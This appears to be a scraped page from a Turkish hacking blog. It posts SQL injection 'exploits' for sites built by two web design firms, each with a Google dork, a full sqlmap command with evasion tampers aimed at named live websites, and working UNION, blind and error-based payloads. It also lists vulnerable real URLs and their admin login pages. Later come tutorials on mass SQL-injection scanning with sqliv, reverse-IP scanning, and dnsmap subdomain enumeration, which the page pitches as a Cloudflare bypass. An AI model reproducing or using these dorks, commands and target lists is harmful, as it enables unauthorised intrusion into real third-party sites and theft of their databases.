-->

ArkansasWeb.com Sql İnjection Vulnerability


[CODE]#################################################################################
# Exploit Title: ArkansasWeb.com Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:Web Design and Hosting by ArkansasWeb.com  & inurl:id=
# Vendor Home: https://www.arkansasweb.com/
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Date : 2017-10-11
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################

Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.employment4u.com/jobdescription.php?id=254"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=254 AND 4058=4058

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=254 UNION ALL SELECT CONCAT(0x717a717171,0x4272554e774d6557774d6a714b694d697a4b43426f78524176614f626c7a4c6d75686359514d4a55,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL#


Demo :
http://www.employment4u.com/jobdescription.php?id=254
http://www.ridgewoodtimbercorp.com/property.php?id=331

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & Odesa & TrazeR & Zer0Day & AKA_1NF4z & Kutluhan & Alianz & By_Dadas & S1R & Seytan6161 [/CODE]

Blogspot Siteyi Acunetix İle Taramak Kadar Saçma Bir Hayat

Selamun Aleyküm.. 
HAKKİMDA Kısmında Belirttiğim Gibi Siradan Kendi Halinde Biriyim. Birilerinin Kuyruguna Bastım Bilerek Yada Bilmeyerek ... Umrumdamı ? Degil Tabikide Bu Lamer Arkadaş Kimse Tebrik Ediyorum Blogspot Siteyi Acunetixle Taramak Nedir? Ne Yani Amacin ? Buraya İndex Atsan Ne Olacak ? Ne Geçicek Eline ? 

Blogspot Siteyi Acunetix İle Taramak Kadar Saçma Bir Hayat

Kali Linux Sql İnjection Server Scanner


Selamun Aleyküm ... 

Mazda Gibi Bir Hedef Sİtemız Var Arkadaslar, Cms Joomla
Hedefde Açık Bulunamadıgı Zaman Aynı İp Adresı Üzerındekı Siteler Taranır.
Serversqlscan'da Bu Yuzden Var,Pprogramın Mantıgı Çok Basıt İp adresini Giriyosunuz Buldugu Acıkları Kayit Edecegı Dosya Adını Belırtıyosunuz Beklıyosunuz.. Tool Sizin İçin Bing Arama Motoru Üzerinde İp Adresindeki Siteleri Bulup Sonuna Meta Karakter Olan ' Tek Tırnagı Atiyor Bulursa Gösterip Kayıt Ediyor :) 

Video:


Open Source: https://paste.ubuntu.com/25485392/


Innovins Sql İnjection Vulnerability



[CODE]#################################################################################
# Exploit Title: Innovins Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:"Developed by Innovins" & inurl:id=
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Data : 2017-09-05
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.charlstondsouza.com/event1.php?id=11"

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL#

Demo :
http://www.charlstondsouza.com/event1.php?id=11
http://www.pehl.co.in/page.php?id=17
http://www.sunrich.co.in/article.php?id=2

http://www.charlstondsouza.com/sn-panel/admin-login.php
http://pehl.co.in/admin/login.php
http://www.sunrich.co.in/admin

Note: Look İn The Source Code To Find The Admin Panel
References:
http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/
https://cxsecurity.com/issue/WLB-2017090029

[/CODE]

Kali Linux Massive SQL injection Scanner

 Selamun Aleyküm ...
Sqliv Verilen dork'tan birden fazla web sitesini arar ve sonuçları birer birer tarar:

Kurulum:
git clone https://github.com/Hadesy2k/sqliv.git
cd sqliv
ls
python2 setup.py -i
python sqliv.py
Kullanim : 
Python sqliv.py - d < SQLI  DORK >  - e < ARAMA  MOTORU >   
örnek: python sqliv.py - d "inurl:index.php?id= site:IT" -e google 

Isteğe bağlı bağımsız değişkenler:
-h, --help bu yardım mesajını gösterir ve çıkar
-d inurl:SQL enjeksiyon dork
-e google arama motoru [Google şimdilik]
-p arama motorunda aramak için web sitelerinin sayısı 100
-t www.example.com tarama hedef web sitesini
-r ters etki alanı (reverse ip)

Video: 

Kali Linux Dnsmap - Subdomain Enumeration of Website in

Selamun Aleyküm ... 
 
Dnsmap

Paul Craig'in kurduğu "The Thief No One Saw" adlı kurgusal hikayeden esinlenilerek, Dnsmap ilk olarak 2006'da piyasaya sürüldü ve “Stealing the Network – How to 0wn the Box”. Başlıklı kitaptan esinlenildi.

Dnsmap
esas olarak pentester tarafından altyapı güvenliği değerlendirme/numaralandırma aşamasında bilgi toplama sırasında kullanılmak üzere tasarlanmıştır. Dnsmap Numaralandırma aşamasında, genellikle hedef şirketin IP netblocks, alt alan adlarını keşfetmek için kullanilir, hatta alt alan adlarını tespit ettigi için bu yöntem cloudflare bypass içinde kullanılır.

Genel Kullanimi : dnsmap <hedef alan adi>
Sonuç:

Dnsmap kullanim örnekleri;
Hedefi bir kelime (wordlist) listesi kullanarak taramak için ;
dnsmap example.com -w /root/Desktop/wordlisteniz.txt
yada: dnsmap example.com -w /usr/share/wordlists/dnsmap.txt

Dnsmap-bulk Kullanim Örnegi;

Birden fazla alan adlarını (domains.txt) içeren bir dosya oluşturun ve bunu dnsmap-bulk.sh 'ye gönderin
 örnek: dnsmap-bulk.sh /root/Desktop/ domains.txt